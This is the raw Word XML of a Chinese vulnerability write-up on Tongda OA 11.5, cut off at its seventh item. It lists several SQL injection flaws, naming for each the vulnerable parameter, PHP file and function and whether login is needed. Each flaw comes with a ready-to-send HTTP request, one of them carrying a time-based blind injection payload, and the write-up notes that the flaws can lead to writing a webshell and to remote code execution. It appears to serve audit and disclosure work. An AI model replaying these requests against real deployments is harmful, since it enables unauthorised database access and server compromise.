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60FA7185" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="00F71099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F71099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通达OA11.5</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> sql注入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3F0C627A" w:rsidR="004D158C" w:rsidRPr="00811A93" w:rsidRDefault="00811A93" w:rsidP="006B645E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811A93">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>通达OA11.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00811A93">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sql注入漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，数据库不安全配置导致可以通过数据库写马到服务器，然后造成远程代码 执行。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2F812373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F71099" w:rsidRPr="00F71099">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sql注入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259AED09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621D5E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测试为</w:t>
      </w:r>
      <w:r w:rsidR="00621D5E">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OA11.5版本，其他版本估计也有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B7690F" w14:textId="032EE7D2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70CA9D5A" w14:textId="64208286" w:rsidR="00A75A93" w:rsidRPr="00A75A93" w:rsidRDefault="00A75A93" w:rsidP="007D0B4C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL注入:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378254C8" w14:textId="77777777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1DFB3C1F" w14:textId="77777777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A75A9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POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/portal/home/Cookie: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A9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lastRenderedPageBreak/>
        <w:t>PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffConnection: keep-aliveHost: 192.168.43.169Pragma: no-cacheX-Requested-With: XMLHttpRequestContent-Length: 154X-WVS-ID: Acunetix-Autologin/65535Cache-Control: no-cacheAccept: */*Origin: http://192.168.43.169Accept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A9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br/>
        <w:t>starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&amp;endtime=1598918400&amp;view=month&amp;condition=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3E4555" w14:textId="77777777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51F6A013" w14:textId="7D7C86B5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E755E3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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2FA90583" wp14:editId="3B491377">
            <wp:extent cx="5274310" cy="24339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DCB4" w14:textId="77777777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A75A9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</w:r>
      <w:r w:rsidRPr="00A75A9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lastRenderedPageBreak/>
        <w:t>漏洞文件：webroot\general\appbuilder\modules\calendar\models\Calendar.php。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A9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get_callist_data函数接收传入的begin_date变量未经过滤直接拼接在查询语句中造成注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE4787C" w14:textId="77777777" w:rsidR="00470D35" w:rsidRDefault="00A75A93" w:rsidP="00470D35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E755E3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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2453F2C" wp14:editId="30EA9B88">
            <wp:extent cx="5274310" cy="21062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A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>利用条件：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一枚普通账号登录权限，但测试发现，某些低版本也无需登录也可注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495311EE" w14:textId="4E3C2CDD" w:rsidR="00470D35" w:rsidRDefault="00A75A93" w:rsidP="008C7D3F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL注入:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608CE7B" w14:textId="42E84BCB" w:rsidR="00A75A93" w:rsidRDefault="00A75A93" w:rsidP="00470D35">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>漏洞参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>orderby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B0839C" w14:textId="77777777" w:rsidR="00470D35" w:rsidRPr="00A75A93" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE63E71" w14:textId="77777777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A75A9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GET /general/email/sentbox/get_index_data.php?asc=0&amp;boxid=&amp;boxname=sentbox&amp;curnum=3&amp;emailtype=ALLMAIL&amp;keyword=sample%40email.tst&amp;orderby=1&amp;pagelimit=20&amp;tag=&amp;timestamp=1598069133&amp;total= HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169/Cookie: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A9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lastRenderedPageBreak/>
        <w:t>PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF65555" w14:textId="77777777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6E348760" w14:textId="3D7EFB0C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E755E3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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5952086" wp14:editId="41CF01A5">
            <wp:extent cx="5274310" cy="11588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0411" w14:textId="25623272" w:rsidR="00470D35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A75A9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漏洞文件：webroot\inc\utility_email.php，get_sentbox_data函数接收传入参数未过滤，直接拼接在order by后面了造成注入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A9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利用条件：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A9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一枚普通账号登录权限，但测试发现，某些低版本也无需登录也可注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715DF76F" w14:textId="7592007C" w:rsidR="00470D35" w:rsidRDefault="00A75A93" w:rsidP="008C7D3F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL注入:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B3AC84" w14:textId="59F6EFE5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A75A9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</w:r>
      <w:r w:rsidRPr="00A75A9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lastRenderedPageBreak/>
        <w:t>漏洞参数：orderby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B84CF08" w14:textId="77777777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11075733" w14:textId="77777777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A75A9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GET /general/email/inbox/get_index_data.php?asc=0&amp;boxid=&amp;boxname=inbox&amp;curnum=0&amp;emailtype=ALLMAIL&amp;keyword=&amp;orderby=3--&amp;pagelimit=10&amp;tag=&amp;timestamp=1598069103&amp;total= HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD9C1CC" w14:textId="30C8453E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4BEC8520" w14:textId="3027F044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E755E3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial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5FA5867C" wp14:editId="19C4DB90">
            <wp:extent cx="5274310" cy="24523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0A8B" w14:textId="77777777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A75A9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漏洞文件：webroot\inc\utility_email.php，get_email_data函数传入参数未过滤，直接拼接在order by后面了造成注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED623F" w14:textId="613A78DC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E755E3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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6C2538D5" wp14:editId="7D6D3295">
            <wp:extent cx="5274310" cy="2513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610C" w14:textId="77777777" w:rsidR="00470D35" w:rsidRDefault="00A75A93" w:rsidP="00E755E3">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75A9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利用条件：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A9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一枚普通账号登录权限，但测试发现，某些低版本也无需登录也可注入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A9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</w:r>
      <w:r w:rsidRPr="00A75A9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</w:r>
    </w:p>
    <w:p w14:paraId="0A9B65CC" w14:textId="7D298BF4" w:rsidR="00470D35" w:rsidRDefault="00A75A93" w:rsidP="008C7D3F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL注入:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DEC602" w14:textId="2EF86730" w:rsidR="00A75A93" w:rsidRPr="00A75A93" w:rsidRDefault="00A75A93" w:rsidP="00470D35">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>漏洞参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ABF502" w14:textId="77777777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31BB9A70" w14:textId="6C099560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A75A9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GET /general/appbuilder/web/report/repdetail/edit?link_type=false&amp;slot={}&amp;id=2 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70D8EF" w14:textId="381DD88E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E755E3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial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6B0231E5" wp14:editId="43C35C7E">
            <wp:extent cx="5274310" cy="17875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2B2E" w14:textId="3F01837B" w:rsidR="00A75A93" w:rsidRPr="00A75A93" w:rsidRDefault="00A75A93" w:rsidP="00E755E3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E755E3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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E411B65" wp14:editId="05E7DA7D">
            <wp:extent cx="5274310" cy="1035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A9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漏洞文件：webroot\general\appbuilder\modules\report\controllers\RepdetailController.php，actionEdit函数中存在 一个$_GET["id"];  未经过滤，拼接到SQL查询中，造成了SQL注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73867918" w14:textId="77777777" w:rsidR="00470D35" w:rsidRDefault="00A75A93" w:rsidP="00470D35">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="560"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E755E3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32C4DF9D" wp14:editId="06FF0A5B">
            <wp:extent cx="5274310" cy="21132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A93">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>利用条件：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75A93">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>一枚普通账号登录权限，但测试发现，某些低版本也无需登录也可注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27898150" w14:textId="3DEB1A09" w:rsidR="00470D35" w:rsidRDefault="00470D35" w:rsidP="008C7D3F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00470D35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL注入(11.5版本无需登录):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C50A77" w14:textId="08E07F8A" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="560"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00470D35">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>漏洞参数：SORT_ID，FILE_SORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>审计版本：通达OA 11.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723420C5" w14:textId="77777777" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="right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54DA192E" w14:textId="77777777" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="0047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470D35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POST /general/file_folder/swfupload_new.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/Connection: closeHost: 192.168.202.1Content-Length: 391Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USContent-Type: multipart/form-data; boundary=----------GFioQpMK0vv2</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35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br/>
        <w:t>------------GFioQpMK0vv2Content-Disposition: form-data; name="ATTACHMENT_ID"</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35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br/>
        <w:t>1------------GFioQpMK0vv2Content-Disposition: form-data; name="ATTACHMENT_NAME"</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35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br/>
        <w:t>1------------GFioQpMK0vv2Content-Disposition: form-data; name="FILE_SORT"</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35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br/>
        <w:t>2------------GFioQpMK0vv2Content-Disposition: form-data; name="SORT_ID"</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35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br/>
        <w:t>------------GFioQpMK0vv2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E04DE0A" w14:textId="2D3E1662" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D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B727995" wp14:editId="395C003D">
            <wp:extent cx="5274310" cy="14751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61BD" w14:textId="0B1ACDA3" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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470D3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看看下图，在我去掉cookie之后，发现一样能注入，我测试的11.5版本存在未授权也能注入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D3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漏洞文件：webroot\general\file_folder\swfupload_new.php 。</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D3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先看SORT_ID与FILE_SORT参数，这两个参数都 是通过$data[""]; 来接收变量，都直接带入SQL查询语句中，没有做任何过滤，造成注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69518D4A" w14:textId="77777777" w:rsidR="00D47299" w:rsidRDefault="00D47299" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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496BABC" wp14:editId="5FABBDE5">
            <wp:extent cx="5274310" cy="25685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FFED" w14:textId="77777777" w:rsidR="005651A7" w:rsidRDefault="00D47299" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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D7267CD" wp14:editId="71B9432C">
            <wp:extent cx="5274310" cy="3105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82F4" w14:textId="7F5291A0" w:rsidR="005651A7" w:rsidRDefault="00470D35" w:rsidP="008C7D3F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00470D35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL注入（有过滤）:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B09C35" w14:textId="29D82B01" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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470D3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漏洞参数：CONTENT_ID_STR</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D3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审计版本：通达OA 11.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD71C57" w14:textId="77777777" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="right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4DB7DA18" w14:textId="226D8E40" w:rsidR="005651A7" w:rsidRDefault="00470D35" w:rsidP="0047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470D35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POST /general/file_folder/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/general/file_folder/public_folder.php?FILE_SORT=1&amp;SORT_ID=59X-Resource-Type: xhrCookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; </w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35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lastRenderedPageBreak/>
        <w:t>SID_1=fab32701Connection: closeHost: 192.168.202.1Pragma: no-cachex-requested-with: XMLHttpRequestContent-Length: 82x-wvs-id: Acunetix-Deepscan/209Cache-Control: no-cacheaccept: */*origin: http://192.168.202.1Accept-Language: en-UScontent-type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35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br/>
        <w:t>CONTENT_ID_STR=222&amp;SORT_ID=59&amp;FILE_SORT=1&amp;action=sign</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D3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</w:r>
      <w:r w:rsidR="005651A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F84AE22" wp14:editId="151A728B">
            <wp:extent cx="5274310" cy="9867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0A22" w14:textId="77777777" w:rsidR="00A34D91" w:rsidRDefault="00470D35" w:rsidP="0047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470D3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漏洞文件：webroot\general\file_folder\folder.php。</w:t>
      </w:r>
      <w:r w:rsidRPr="00470D3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但是经过了td_trim函数，会过滤掉：空格、制表符、换行符、回车符、垂直制表符等。只能报错，或尝试 and 等语句判断还是没有问题的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A18FA57" w14:textId="77777777" w:rsidR="00A34D91" w:rsidRDefault="00A34D91" w:rsidP="0047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65BF7B1" wp14:editId="1B837D7C">
            <wp:extent cx="5274310" cy="20574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4663" w14:textId="13815AE4" w:rsidR="00470D35" w:rsidRDefault="00A34D91" w:rsidP="0047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7044103" wp14:editId="0CE3A017">
            <wp:extent cx="5274310" cy="17684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D35" w:rsidRPr="00470D3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如果有厉害的师傅会有戏，可以绕绕试试了，先放这里了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648889B5" w14:textId="21C429FA" w:rsidR="00A34D91" w:rsidRPr="00470D35" w:rsidRDefault="00A34D91" w:rsidP="0047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22AA77A" wp14:editId="621DF623">
            <wp:extent cx="5274310" cy="12598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A409" w14:textId="1DA99679" w:rsidR="00822600" w:rsidRDefault="00470D35" w:rsidP="00822600">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00470D35">
        <w:rPr>
          <w:noProof/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F286E5B" wp14:editId="7A0E0B6B">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="14" name="矩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29503" id="矩形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9TqT2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 w:rsidR="008C7D3F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00470D35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL注入:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706AEDC1" w14:textId="1904220A" w:rsidR="00470D35" w:rsidRPr="00470D35" w:rsidRDefault="00470D35" w:rsidP="00470D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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470D3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漏洞参数：remark</w:t>
      </w:r>
